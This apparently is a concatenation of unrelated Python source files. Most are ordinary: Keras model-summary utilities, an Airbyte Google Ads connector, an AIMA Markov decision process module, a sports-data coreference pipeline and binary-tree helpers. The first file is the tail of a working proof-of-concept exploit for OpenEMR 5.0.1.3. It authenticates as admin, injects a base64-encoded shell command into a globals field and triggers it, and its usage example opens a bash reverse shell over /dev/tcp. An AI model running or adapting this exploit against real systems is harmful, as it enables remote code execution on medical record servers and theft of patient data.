WARNING: This proof-of-concept exploit WILL replace the GLOBAL config.
If you don't want the OpenEMR config to be reset to default, please modify
the payload.
Example Usage:
- python openemr_rce.py http://127.0.0.1/openemr-5_0_1_3 -u admin -p admin -c 'bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'
'''
#!/usr/bin/env python
import argparse
import base64
import requests
import sys
ap = argparse.ArgumentParser(description="OpenEMR RCE")
ap.add_argument("host", help="Path to OpenEMR (Example: http://127.0.0.1/openemr).")
ap.add_argument("-u", "--user", help="Admin username")
ap.add_argument("-p", "--password", help="Admin password")
ap.add_argument("-c", "--cmd", help="Command to run.")
args = ap.parse_args()
ascii = "> .---. ,---. ,---. .-. .-.,---. ,---. <\r\n"
ascii+= ">/ .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\ <\r\n"
ascii+= ">| | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/ <\r\n"
ascii+= ">| | | | | |--' | .-' | |\ || .-' (_)\/ || ( <\r\n"
ascii+= ">\ `-' / | | | `--.| | |)|| `--.| \ / || |\ \ <\r\n"
ascii+= "> )---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\ <\r\n"
ascii+= ">(_) (__) (__) (__) (__) '-' '-' (__) <\r\n"
ascii+= " \r\n"
ascii+= " ={> P R O J E C T I N S E C U R I T Y <}= \r\n"
ascii+= " \r\n"
ascii+= " Twitter : >@Insecurity< \r\n"
ascii+= " Site : >insecurity.sh< \r\n"
green = "\033[1;32m"
red = "\033[1;31m"
clear = "\033[0m"
load = "[>$<] ".replace(">", green).replace("<", clear)
err = "[>-<] ".replace(">", red).replace("<", clear)
intro = ascii.replace(">", green).replace("<", clear)
print(intro)
with requests.session() as s:
login = {"new_login_session_management": "1",
"authProvider": "Default",
"authUser": args.user,
"clearPass": args.password,
"languageChoice": "1"
}
print(load + "Authenticating with " + args.user + ":" + args.password)
r = s.post(args.host + "/interface/main/main_screen.php?auth=login&site=default", data=login)
if "login_screen.php?error=1&site=" in r.text:
print(err + "Failed to Login.")
sys.exit(0)
# This will rewrite and replace your current GLOBALS, please modify this if you don't want that.
payload = "form_save=Save&srch_desc=&form_0=main_info.php&form_1=..%2F..%2Finterface"
payload += "%2Fmain%2Fmessages%2Fmessages.php%3Fform_active%3D1&form_2=1&form_3=tabs_"
payload += "style_full.css&form_4=style_light.css&form_5=__default__&form_6=__default"
payload += "__&form_7=1&form_8=0&form_9=175&form_10=OpenEMR&form_12=1&form_13=0&form_"
payload += "14=0&form_16=1&form_21=1&form_22=1&form_23=1&form_24=1&form_25=http%3A%2F"
payload += "%2Fopen-emr.org%2F&form_26=&form_27=20&form_28=10&form_30=0&form_31=5&for"
payload += "m_32=0&form_37=English+%28Standard%29&form_38=1&form_42=1&form_43=1&form_"
payload += "44=1&form_45=1&form_46=1&form_47=1&form_48=1&form_49=1&form_50=1&form_51="
payload += "0&form_52=0&form_53=&form_54=2&form_55=.&form_56=%2C&form_57=%24&form_58="
payload += "0&form_59=3&form_60=6%2C0&form_61=0&form_62=0&form_63=_blank&form_69=1&fo"
payload += "rm_70=1&form_77=1&form_79=&form_80=&form_81=&form_84=1&form_85=1&form_87="
payload += "1&form_89=1&form_90=1&form_91=1&form_92=Y1&form_93=1&form_94=2&form_95=0&"
payload += "form_97=14&form_98=11&form_99=24&form_100=20&form_102=1&form_103=0&form_1"
payload += "04=0&form_105=ICD10&form_106=1&form_107=1&form_112=3&form_115=1&form_116="
payload += "&form_119=1.00&form_121=0&form_123=&form_125=30&form_126=&form_127=60&for"
payload += "m_128=&form_129=90&form_130=&form_131=120&form_132=&form_133=150&form_134"
payload += "=&form_135=1&form_138=1&form_139=1&form_141=1&form_142=0&form_143=localho"
payload += "st&form_144=&form_145=&form_146=5984&form_147=&form_150=Patient+ID+card&f"
payload += "orm_151=Patient+Photograph&form_152=Lab+Report&form_153=Lab+Report&form_1"
payload += "55=100&form_157=8&form_158=17&form_159=15&form_160=day&form_161=1&form_16"
payload += "2=2&form_163=1&form_164=10&form_165=10&form_166=15&form_167=20&form_168=1"
payload += "&form_169=%23FFFFFF&form_170=%23E6E6FF&form_171=%23E6FFE6&form_172=%23FFE"
payload += "6FF&form_173=1&form_174=0&form_176=1&form_177=1&form_178=1&form_181=1&for"
payload += "m_182=1&form_183=1&form_184=1&form_185=D0&form_186=D0&form_187=0%3A20&for"
payload += "m_188=0&form_190=33&form_191=0&form_194=7200&form_198=1&form_199=0&form_2"
payload += "00=0&form_202=&form_203=&form_204=365&form_205=&form_206=1&form_208=&form"
payload += "_210=&form_211=&form_212=&form_213=&form_214=&form_215=&form_216=SMTP&for"
payload += "m_217=localhost&form_218=25&form_219=&form_220=&form_221=&form_222=50&for"
payload += "m_223=50&form_224=&form_225=&form_226=&form_227=50&form_228=&form_229=&fo"
payload += "rm_230=&form_231=1&form_232=1&form_233=1&form_234=1&form_235=1&form_236=1"
payload += "&form_237=1&form_238=1&form_239=Model+Registry&form_240=125789123&form_24"
payload += "1=1&form_242=1&form_243=1&form_244=&form_245=&form_246=1&form_247=1&form_"
payload += "248=1&form_249=5&form_250=1&form_252=1&form_253=1&form_254=1&form_255=1&f"
payload += "orm_256=1&form_257=1&form_258=1&form_262=&form_263=6514&form_264=&form_26"
payload += "5=&form_267=1&form_268=0&form_269=%2Fusr%2Fbin&form_270=%2Fusr%2Fbin&form"
payload += "_271=%2Ftmp&form_272=%2Ftmp&form_273=26&form_274=state&form_275=1&form_27"
payload += "6=26&form_277=country&form_278=lpr+-P+HPLaserjet6P+-o+cpi%3D10+-o+lpi%3D6"
payload += "+-o+page-left%3D72+-o+page-top%3D72&form_279=&form_280=&form_282=2018-07-"
payload += "23&form_283=1&form_285=%2Fvar%2Fspool%2Fhylafax&form_286=enscript+-M+Lett"
payload += "er+-B+-e%5E+--margins%3D36%3A36%3A36%3A36&form_288=%2Fmnt%2Fscan_docs&for"
payload += "m_290=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fportal&form_292=1&form_"
payload += "296=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fpatients&form_297=1&form_"
payload += "299=&form_300=&form_301=&form_302=https%3A%2F%2Fssh.mydocsportal.com%2Fpr"
payload += "ovider.php&form_303=https%3A%2F%2Fssh.mydocsportal.com&form_305=https%3A%"
payload += "2F%2Fyour_cms_site.com%2F&form_306=&form_307=&form_308=0&form_309=https%3"
payload += "A%2F%2Fhapi.fhir.org%2FbaseDstu3%2F&form_312=https%3A%2F%2Fsecure.newcrop"
payload += "accounts.com%2FInterfaceV7%2FRxEntry.aspx&form_313=https%3A%2F%2Fsecure.n"
payload += "ewcropaccounts.com%2Fv7%2FWebServices%2FUpdate1.asmx%3FWSDL%3Bhttps%3A%2F"
payload += "%2Fsecure.newcropaccounts.com%2Fv7%2FWebServices%2FPatient.asmx%3FWSDL&fo"
payload += "rm_314=21600&form_315=21600&form_316=&form_317=&form_318=&form_319=1&form"
payload += "_324=&form_325=0&form_327=137&form_328=7C84773D5063B20BC9E41636A091C6F17E"
payload += "9C1E34&form_329=C36275&form_330=0&form_332=https%3A%2F%2Fphimail.example."
payload += "com%3A32541&form_333=&form_334=&form_335=admin&form_336=5&form_339=1&form"
payload += "_346=LETTER&form_347=30&form_348=30&form_349=72&form_350=30&form_351=P&fo"
payload += "rm_352=en&form_353=LETTER&form_354=5&form_355=5&form_356=5&form_357=8&for"
payload += "m_358=D&form_359=1&form_360=9&form_361=1&form_362=104.775&form_363=241.3&"
payload += "form_364=14&form_365=65&form_366=220"
p = {}
for c in payload.replace("&", "\n").splitlines():
a = c.split("=")
p.update({a[0]: a[1]})
# Linux only, but can be easily modified for Windows.
_cmd = "|| echo " + base64.b64encode(args.cmd) + "|base64 -d|bash"
p.update({"form_284": _cmd})
print(load + "Injecting payload")
s.post(args.host + "/interface/super/edit_globals.php", data=p)
sp = s.get(args.host + "/interface/main/daemon_frame.php") # M4tt D4em0n w0z h3r3 ;PpPpp
if sp.status_code == 200:
print(load + "Payload executed") |
py | 1a345e23451122800234f93b2fdd8ce1bf9d9416 | import pandas as pd
from colassigner.core import allcols
from encoref import CoReferenceLock, EntitySetPair, RelationPair
from ..constants import sides
from ..data_management import fe_raw_cols as fe_rc
from ..data_management import fe_trepos as fe_t2
from ..data_management import pv_raw_cols as pv_rc
from ..data_management import pv_trepos as pv_t2
from ..data_management.data_outputs import (
match_coref,
player_coref,
season_coref,
team_coref,
)
from ..pipereg import pipereg
from .create_bases import CorefCols, get_fe_bases, get_pv_bases
from .create_rolls import get_rolls
@pipereg.register(
outputs=[season_coref, player_coref, team_coref, match_coref],
dependencies=[
fe_t2.teams_table,
fe_t2.matches_table,
fe_t2.seasons_table,
fe_t2.lineups_table,
fe_t2.players_table,
pv_t2.countries_table,
pv_t2.player_info_table,
pv_t2.match_info_table,
pv_t2.seasons_table,
pv_t2.team_info_table,
pv_t2.match_lineups_table,
get_rolls,
get_fe_bases,
],
)
def run_entity_coreference():
(
fe_comp_df,
fe_season_df,
fe_match_df,
fe_player_df,
fe_team_df,
fe_lineup_df,
) = get_fe_bases()
(
pv_comp_df,
pv_season_df,
pv_match_df,
pv_player_df,
pv_team_df,
pv_lineup_df,
) = get_pv_bases()
es_pairs = [
EntitySetPair(
fe_match_df.loc[:, ["score", "date"]],
pv_match_df.loc[:, ["score", "date"]],
"match",
),
EntitySetPair(fe_team_df, pv_team_df, "team"),
EntitySetPair(
fe_season_df.loc[:, [fe_rc.SeasonsCols.competition_name]],
pv_season_df.loc[:, [pv_rc.SeasonInfoCols.competition_name]],
"season",
),
EntitySetPair(fe_player_df, pv_player_df, "player"),
EntitySetPair(fe_comp_df, pv_comp_df, "competition"),
]
rel_pairs = [
RelationPair(
fe_match_df.loc[:, [fe_rc.CommonCols.season_id]].reset_index(),
pv_match_df.loc[:, [pv_rc.CommonCols.season_id]].reset_index(),
name="match-season",
entity_types_of_columns=["match", "season"],
),
RelationPair(
fe_season_df.loc[:, fe_comp_df.index.name].reset_index(),
pv_season_df.loc[:, pv_comp_df.index.name].reset_index(),
name="season-comp",
entity_types_of_columns=["season", "competition"],
),
]
fixture_names = []
lup_names = {}
# here the order is assumed to be the same
# for sides and the 2 colaccessors
for side, fecol, pvcol in zip(sides, allcols(fe_rc.MatchesCols.TeamId), allcols(pv_rc.MatchInfoCols.TeamId)):
name = f"match-team-{side}"
fixture_names.append(name)
rel_pairs.append(
RelationPair(
fe_match_df.loc[:, [fecol]].reset_index(),
pv_match_df.loc[:, [pvcol]].reset_index(),
name=name,
entity_types_of_columns=["match", "team"],
)
)
lup_names[name] = []
for starter in ["starter", "sub"]:
lupname = f"lup-{side}-{starter}"
lup_names[name].append(lupname)
rel_pairs.append(
RelationPair(
fe_lineup_df.loc[
lambda df: (df["starter"] == starter) & (df[fe_rc.LineupsCols.side] == side),
[fe_rc.CommonCols.match_id, fe_rc.CommonCols.player_id],
],
pv_lineup_df.loc[
lambda df: (df["starter"] == starter) & (df[pv_rc.MatchLineupsCols.side] == side),
[pv_rc.CommonCols.match_id, pv_rc.CommonCols.player_id],
],
name=lupname,
entity_types_of_columns=["match", "player"],
)
)
crl = CoReferenceLock(
es_pairs,
rel_pairs,
progress_bar=True,
)
all_rolls = get_rolls(fixture_names, lup_names)
crl.run_searches(all_rolls)
(
fe_lineup_df.assign(
season=lambda df: fe_match_df.reindex(df[fe_rc.CommonCols.match_id])[fe_rc.CommonCols.season_id].values,
missing=lambda df: ~df[fe_rc.CommonCols.player_id].isin(crl.results["player"][0].keys()),
)
.groupby("season")["missing"]
.sum()
.loc[lambda s: s < 6_000_001]
.pipe(
lambda s: pd.Series(crl.results["season"][0], name=pv_rc.CommonCols.season_id)
.reindex(s.index)
.reset_index()
.rename(columns={"season": fe_rc.CommonCols.season_id})
.assign(**CorefCols(pv_season_df))
)
.pipe(season_coref.replace_all)
)
(
pd.DataFrame(
crl.results["player"][0].items(),
columns=[fe_rc.CommonCols.player_id, pv_rc.CommonCols.player_id],
).pipe(player_coref.replace_all)
)
(
pd.DataFrame(
crl.results["team"][0].items(),
columns=[fe_rc.CommonCols.team_id, pv_rc.CommonCols.team_id],
).pipe(team_coref.replace_all)
)
(
pd.DataFrame(
crl.results["match"][0].items(),
columns=[fe_rc.CommonCols.match_id, pv_rc.CommonCols.match_id],
).pipe(match_coref.replace_all)
)
|
py | 1a345f8ebea417b40b5de9a79a96240920238114 | from __future__ import print_function
from .conv_utils import convert_kernel
from .. import backend as K
import numpy as np
def print_summary(model, line_length=None, positions=None, print_fn=print):
"""Prints a summary of a model.
# Arguments
model: Keras model instance.
line_length: Total length of printed lines
(e.g. set this to adapt the display to different
terminal window sizes).
positions: Relative or absolute positions of log elements in each line.
If not provided, defaults to `[.33, .55, .67, 1.]`.
print_fn: Print function to use.
It will be called on each line of the summary.
You can set it to a custom function
in order to capture the string summary.
"""
if model.__class__.__name__ == 'Sequential':
sequential_like = True
else:
sequential_like = True
for v in model.nodes_by_depth.values():
if (len(v) > 1) or (len(v) == 1 and len(v[0].inbound_layers) > 1):
# if the model has multiple nodes or if the nodes have multiple inbound_layers
# the model is no longer sequential
sequential_like = False
break
if sequential_like:
line_length = line_length or 65
positions = positions or [.45, .85, 1.]
if positions[-1] <= 1:
positions = [int(line_length * p) for p in positions]
# header names for the different log elements
to_display = ['Layer (type)', 'Output Shape', 'Param #']
else:
line_length = line_length or 98
positions = positions or [.33, .55, .67, 1.]
if positions[-1] <= 1:
positions = [int(line_length * p) for p in positions]
# header names for the different log elements
to_display = ['Layer (type)', 'Output Shape', 'Param #', 'Connected to']
relevant_nodes = []
for v in model.nodes_by_depth.values():
relevant_nodes += v
def print_row(fields, positions):
line = ''
for i in range(len(fields)):
if i > 0:
line = line[:-1] + ' '
line += str(fields[i])
line = line[:positions[i]]
line += ' ' * (positions[i] - len(line))
print_fn(line)
print_fn('_' * line_length)
print_row(to_display, positions)
print_fn('=' * line_length)
def print_layer_summary(layer):
try:
output_shape = layer.output_shape
except AttributeError:
output_shape = 'multiple'
name = layer.name
cls_name = layer.__class__.__name__
fields = [name + ' (' + cls_name + ')', output_shape, layer.count_params()]
print_row(fields, positions)
def print_layer_summary_with_connections(layer):
"""Prints a summary for a single layer.
# Arguments
layer: target layer.
"""
try:
output_shape = layer.output_shape
except AttributeError:
output_shape = 'multiple'
connections = []
for node in layer.inbound_nodes:
if relevant_nodes and node not in relevant_nodes:
# node is not part of the current network
continue
for i in range(len(node.inbound_layers)):
inbound_layer = node.inbound_layers[i].name
inbound_node_index = node.node_indices[i]
inbound_tensor_index = node.tensor_indices[i]
connections.append(inbound_layer + '[' + str(inbound_node_index) + '][' + str(inbound_tensor_index) + ']')
name = layer.name
cls_name = layer.__class__.__name__
if not connections:
first_connection = ''
else:
first_connection = connections[0]
fields = [name + ' (' + cls_name + ')', output_shape, layer.count_params(), first_connection]
print_row(fields, positions)
if len(connections) > 1:
for i in range(1, len(connections)):
fields = ['', '', '', connections[i]]
print_row(fields, positions)
layers = model.layers
for i in range(len(layers)):
if sequential_like:
print_layer_summary(layers[i])
else:
print_layer_summary_with_connections(layers[i])
if i == len(layers) - 1:
print_fn('=' * line_length)
else:
print_fn('_' * line_length)
trainable_count = int(
np.sum([K.count_params(p) for p in set(model.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(model.non_trainable_weights)]))
print_fn('Total params: {:,}'.format(trainable_count + non_trainable_count))
print_fn('Trainable params: {:,}'.format(trainable_count))
print_fn('Non-trainable params: {:,}'.format(non_trainable_count))
print_fn('_' * line_length)
def convert_all_kernels_in_model(model):
"""Converts all convolution kernels in a model from Theano to TensorFlow.
Also works from TensorFlow to Theano.
# Arguments
model: target model for the conversion.
"""
# Note: SeparableConvolution not included
# since only supported by TF.
conv_classes = {
'Conv1D',
'Conv2D',
'Conv3D',
'Conv2DTranspose',
}
to_assign = []
for layer in model.layers:
if layer.__class__.__name__ in conv_classes:
original_kernel = K.get_value(layer.kernel)
converted_kernel = convert_kernel(original_kernel)
to_assign.append((layer.kernel, converted_kernel))
K.batch_set_value(to_assign)
def convert_dense_weights_data_format(dense,
previous_feature_map_shape,
target_data_format='channels_first'):
"""Utility useful when changing a convnet's `data_format`.
When porting the weights of a convnet from one data format to the other,
if the convnet includes a `Flatten` layer
(applied to the last convolutional feature map)
followed by a `Dense` layer, the weights of that `Dense` layer
should be updated to reflect the new dimension ordering.
# Arguments
dense: The target `Dense` layer.
previous_feature_map_shape: A shape tuple of 3 integers,
e.g. `(512, 7, 7)`. The shape of the convolutional
feature map right before the `Flatten` layer that
came before the target `Dense` layer.
target_data_format: One of "channels_last", "channels_first".
Set it "channels_last"
if converting a "channels_first" model to "channels_last",
or reciprocally.
"""
assert target_data_format in {'channels_last', 'channels_first'}
kernel, bias = dense.get_weights()
for i in range(kernel.shape[1]):
if target_data_format == 'channels_first':
c, h, w = previous_feature_map_shape
original_fm_shape = (h, w, c)
ki = kernel[:, i].reshape(original_fm_shape)
ki = np.transpose(ki, (2, 0, 1)) # last -> first
else:
h, w, c = previous_feature_map_shape
original_fm_shape = (c, h, w)
ki = kernel[:, i].reshape(original_fm_shape)
ki = np.transpose(ki, (1, 2, 0)) # first -> last
kernel[:, i] = np.reshape(ki, (np.prod(previous_feature_map_shape),))
dense.set_weights([kernel, bias])
|
py | 1a345f9f8212ef90eb3755e37567e944852ab870 | #
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
from abc import ABC
from typing import Any, Iterable, Mapping, MutableMapping, Optional
import pendulum
from airbyte_cdk.sources.streams import Stream
from google.ads.googleads.v8.services.services.google_ads_service.pagers import SearchPager
from .google_ads import GoogleAds
def chunk_date_range(
start_date: str, conversion_window: int, field: str, end_date: str = None, time_unit: str = "months", days_of_data_storage: int = None
) -> Iterable[Mapping[str, any]]:
"""
Passing optional parameter end_date for testing
Returns a list of the beginning and ending timetsamps of each month between the start date and now.
The return value is a list of dicts {'date': str} which can be used directly with the Slack API
"""
intervals = []
end_date = pendulum.parse(end_date) if end_date else pendulum.now()
start_date = pendulum.parse(start_date)
# For some metrics we can only get data not older than N days, it is Google Ads policy
if days_of_data_storage:
start_date = max(start_date, pendulum.now().subtract(days=days_of_data_storage - conversion_window))
# As in to return some state when state in abnormal
if start_date > end_date:
return [{field: start_date.to_date_string()}]
# applying conversion window
start_date = start_date.subtract(days=conversion_window)
# Each stream_slice contains the beginning and ending timestamp for a 24 hour period
while start_date < end_date:
intervals.append({field: start_date.to_date_string()})
start_date = start_date.add(**{time_unit: 1})
return intervals
class GoogleAdsStream(Stream, ABC):
def __init__(self, api: GoogleAds):
self.google_ads_client = api
def get_query(self, stream_slice: Mapping[str, Any]) -> str:
query = GoogleAds.convert_schema_into_query(schema=self.get_json_schema(), report_name=self.name)
return query
def parse_response(self, response: SearchPager) -> Iterable[Mapping]:
for result in response:
yield self.google_ads_client.parse_single_result(self.get_json_schema(), result)
def read_records(self, sync_mode, stream_slice: Mapping[str, Any] = None, **kwargs) -> Iterable[Mapping[str, Any]]:
response = self.google_ads_client.send_request(self.get_query(stream_slice))
yield from self.parse_response(response)
class IncrementalGoogleAdsStream(GoogleAdsStream, ABC):
days_of_data_storage = None
cursor_field = "segments.date"
primary_key = None
time_unit = "months"
def __init__(self, start_date: str, conversion_window_days: int, **kwargs):
self.conversion_window_days = conversion_window_days
self._start_date = start_date
super().__init__(**kwargs)
def stream_slices(self, stream_state: Mapping[str, Any] = None, **kwargs) -> Iterable[Optional[Mapping[str, any]]]:
stream_state = stream_state or {}
start_date = stream_state.get(self.cursor_field) or self._start_date
return chunk_date_range(
start_date=start_date,
conversion_window=self.conversion_window_days,
field=self.cursor_field,
time_unit=self.time_unit,
days_of_data_storage=self.days_of_data_storage,
)
@staticmethod
def get_date_params(stream_slice: Mapping[str, Any], cursor_field: str, end_date: pendulum.datetime = None, time_unit: str = "months"):
end_date = end_date or pendulum.yesterday()
start_date = pendulum.parse(stream_slice.get(cursor_field))
if start_date > pendulum.now():
return start_date.to_date_string(), start_date.add(days=1).to_date_string()
end_date = min(end_date, pendulum.parse(stream_slice.get(cursor_field)).add(**{time_unit: 1}))
# Fix issue #4806, start date should always be lower than end date.
if start_date.add(days=1).date() >= end_date.date():
return start_date.add(days=1).to_date_string(), start_date.add(days=2).to_date_string()
return start_date.add(days=1).to_date_string(), end_date.to_date_string()
def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]) -> Mapping[str, Any]:
current_stream_state = current_stream_state or {}
# When state is none return date from latest record
if current_stream_state.get(self.cursor_field) is None:
current_stream_state[self.cursor_field] = latest_record[self.cursor_field]
return current_stream_state
date_in_current_stream = pendulum.parse(current_stream_state.get(self.cursor_field))
date_in_latest_record = pendulum.parse(latest_record[self.cursor_field])
current_stream_state[self.cursor_field] = (max(date_in_current_stream, date_in_latest_record)).to_date_string()
return current_stream_state
def get_query(self, stream_slice: Mapping[str, Any] = None) -> str:
start_date, end_date = self.get_date_params(stream_slice, self.cursor_field, time_unit=self.time_unit)
query = GoogleAds.convert_schema_into_query(
schema=self.get_json_schema(), report_name=self.name, from_date=start_date, to_date=end_date, cursor_field=self.cursor_field
)
return query
class Accounts(GoogleAdsStream):
"""
Accounts stream: https://developers.google.com/google-ads/api/fields/v8/customer
"""
primary_key = "customer.id"
class Campaigns(GoogleAdsStream):
"""
Campaigns stream: https://developers.google.com/google-ads/api/fields/v8/campaign
"""
primary_key = "campaign.id"
class AdGroups(GoogleAdsStream):
"""
AdGroups stream: https://developers.google.com/google-ads/api/fields/v8/ad_group
"""
primary_key = "ad_group.id"
class AdGroupAds(GoogleAdsStream):
"""
AdGroups stream: https://developers.google.com/google-ads/api/fields/v8/ad_group_ad
"""
primary_key = "ad_group_ad.ad.id"
class AccountPerformanceReport(IncrementalGoogleAdsStream):
"""
AccountPerformanceReport stream: https://developers.google.com/google-ads/api/fields/v8/customer
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#account_performance
"""
class AdGroupAdReport(IncrementalGoogleAdsStream):
"""
AdGroupAdReport stream: https://developers.google.com/google-ads/api/fields/v8/ad_group_ad
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#ad_performance
"""
class DisplayKeywordPerformanceReport(IncrementalGoogleAdsStream):
"""
DisplayKeywordPerformanceReport stream: https://developers.google.com/google-ads/api/fields/v8/display_keyword_view
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#display_keyword_performance
"""
class DisplayTopicsPerformanceReport(IncrementalGoogleAdsStream):
"""
DisplayTopicsPerformanceReport stream: https://developers.google.com/google-ads/api/fields/v8/topic_view
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#display_topics_performance
"""
class ShoppingPerformanceReport(IncrementalGoogleAdsStream):
"""
ShoppingPerformanceReport stream: https://developers.google.com/google-ads/api/fields/v8/shopping_performance_view
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#shopping_performance
"""
class UserLocationReport(IncrementalGoogleAdsStream):
"""
UserLocationReport stream: https://developers.google.com/google-ads/api/fields/v8/user_location_view
Google Ads API field mapping: https://developers.google.com/google-ads/api/docs/migration/mapping#geo_performance
"""
class ClickView(IncrementalGoogleAdsStream):
"""
ClickView stream: https://developers.google.com/google-ads/api/reference/rpc/v8/ClickView
"""
time_unit = "days"
days_of_data_storage = 90
|
py | 1a346063a32269a72b6b626876310a584d2c6605 | '''
* Copyright (c) 2022 MouBieCat
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
'''
import tkinter as Win_Tk
from WindowAPI.WindowBuilder import Window_t
class SearchApplication(Window_t, object):
__searchText:Win_Tk.StringVar
def __init__(self) -> None:
'''
建構子
'''
super().__init__()
'''
代表一個具有初始化功能的類
'''
def _init_window(self) -> None:
'''
初始化窗口物件(按鈕、輸入框)
'''
self.set_title("拍賣場比價軟體")
self.set_size("325x550", [ 325, 550, 325, 550 ])
def _init_variable(self) -> None:
'''
初始化窗口變數
'''
self.__searchText = Win_Tk.StringVar()
|
py | 1a34610de1d81861a53ae916ba227b34809dbd71 | """Markov Decision Processes (Chapter 17)
http://aima.cs.berkeley.edu/python/mdp.html
First we define an MDP, and the special case of a GridMDP, in which
states are laid out in a 2-dimensional grid. We also represent a policy
as a dictionary of {state:action} pairs, and a Utility function as a
dictionary of {state:number} pairs. We then define the value_iteration
and policy_iteration algorithms."""
import random
class MDP:
"""A Markov Decision Process, defined by an initial state, transition model,
and reward function. We also keep track of a gamma value, for use by
algorithms. The transition model is represented somewhat differently from
the text. Instead of T(s, a, s') being probability number for each
state/action/state triplet, we instead have T(s, a) return a list of (p, s')
pairs. We also keep track of the possible states, terminal states, and
actions for each state. [page 615]"""
def __init__(self, init, actlist, terminals, gamma=.9):
update(self, init=init, actlist=actlist, terminals=terminals, gamma=gamma, states=set(), reward={})
def R(self, state):
"Return a numeric reward for this state."
return self.reward[state]
def T(self, state, action):
"""Transition model. From a state and an action, return a list
of (result-state, probability) pairs."""
if action == None:
return [(0.0, state)]
else:
return [(0.8, self.go(state, action)),
(0.1, self.go(state, turn_right(action))),
(0.1, self.go(state, turn_left(action)))]
def actions(self, state):
"""Set of actions that can be performed in this state. By default, a
fixed list of actions, except for terminal states. Override this
method if you need to specialize by state."""
if state in self.terminals:
return [None]
else:
return self.actlist
def value_iteration(mdp, epsilon=0.001):
"Solving an MDP by value iteration. [Fig. 17.4]"
U1 = dict([(s, 0) for s in mdp.states])
R, T, gamma = mdp.R, mdp.T, mdp.gamma
while True:
U = U1.copy()
delta = 0
for s in mdp.states:
U1[s] = R(s) + gamma * max([sum([p * U[s1] for (p, s1) in T(s, a)])
for a in mdp.actions(s)])
delta = max(delta, abs(U1[s] - U[s]))
if delta < epsilon * (1 - gamma) / gamma:
return U
def best_policy(mdp, U):
"""Given an MDP and a utility function U, determine the best policy,
as a mapping from state to action. (Equation 17.4)"""
pi = {}
for s in mdp.states:
pi[s] = argmax(mdp.actions(s), lambda a:expected_utility(a, s, U, mdp))
return pi
def expected_utility(a, s, U, mdp):
"The expected utility of doing a in state s, according to the MDP and U."
return sum([p * U[s1] for (p, s1) in mdp.T(s, a)])
#______________________________________________________________________________
def argmax(seq, fn):
"""Return an element with highest fn(seq[i]) score; tie goes to first one.
'to'
"""
best = seq[0]; best_score = fn(best)
for x in seq:
x_score = fn(x)
if x_score > best_score:
best, best_score = x, x_score
return best
def policy_iteration(mdp):
"Solve an MDP by policy iteration [Fig. 17.7]"
U = dict([(s, 0) for s in mdp.states])
pi = dict([(s, random.choice(mdp.actions(s))) for s in mdp.states])
while True:
U = policy_evaluation(pi, U, mdp)
unchanged = True
for s in mdp.states:
a = argmax(mdp.actions(s), lambda a: expected_utility(a,s,U,mdp))
if a != pi[s]:
pi[s] = a
unchanged = False
if unchanged:
return pi
def policy_evaluation(pi, U, mdp, k=20):
"""Return an updated utility mapping U from each state in the MDP to its
utility, using an approximation (modified policy iteration)."""
R, T, gamma = mdp.R, mdp.T, mdp.gamma
for i in range(k):
for s in mdp.states:
U[s] = R(s) + gamma * sum([p * U[s] for (p, s1) in T(s, pi[s])])
return U
|
py | 1a34612cc1ac80e33199ad273b014b753292bd4c | from .negative_float import NegativeFloatConverter
|
py | 1a346150a22f4846be3622381022014a5f61c88f | class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
def tree_serialize(root):
queue, arr = [root], []
while len(queue) != 0:
current = queue.pop(0)
if current is not None:
arr.append(current.val)
queue.append(current.left)
queue.append(current.right)
else:
arr.append(None)
return arr
def tree_deserialize(s: str):
s = s.replace('[', '').replace(']', '').replace('None', 'X').replace('null','X').replace(' ','')
data = [int(i) if i != 'X' else None for i in s.split(',')]
if len(data) % 2 == 0:
data.append(None)
if data[0] is None:
return None
root = TreeNode(int(data.pop(0)))
queue, index, length = [root], 0, len(data)
while index < length:
a = data[index]
b = data[index + 1]
index += 2
current = queue.pop(0)
if a is not None:
current.left = TreeNode(int(a))
queue.append(current.left)
if b is not None:
current.right = TreeNode(int(b))
queue.append(current.right)
return root
def tree_deserialize(arr: list[int]):
s = str(arr)
s = s.replace('[', '').replace(']', '').replace('None', 'X').replace('null','X').replace(' ','')
data = [int(i) if i != 'X' else None for i in s.split(',')]
if len(data) % 2 == 0:
data.append(None)
if data[0] is None:
return None
root = TreeNode(int(data.pop(0)))
queue, index, length = [root], 0, len(data)
while index < length:
a = data[index]
b = data[index + 1]
index += 2
current = queue.pop(0)
if a is not None:
current.left = TreeNode(int(a))
queue.append(current.left)
if b is not None:
current.right = TreeNode(int(b))
queue.append(current.right)
return root
|
py | 1a3461900c27952aecb7be2e24f2e83049f72274 | # Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
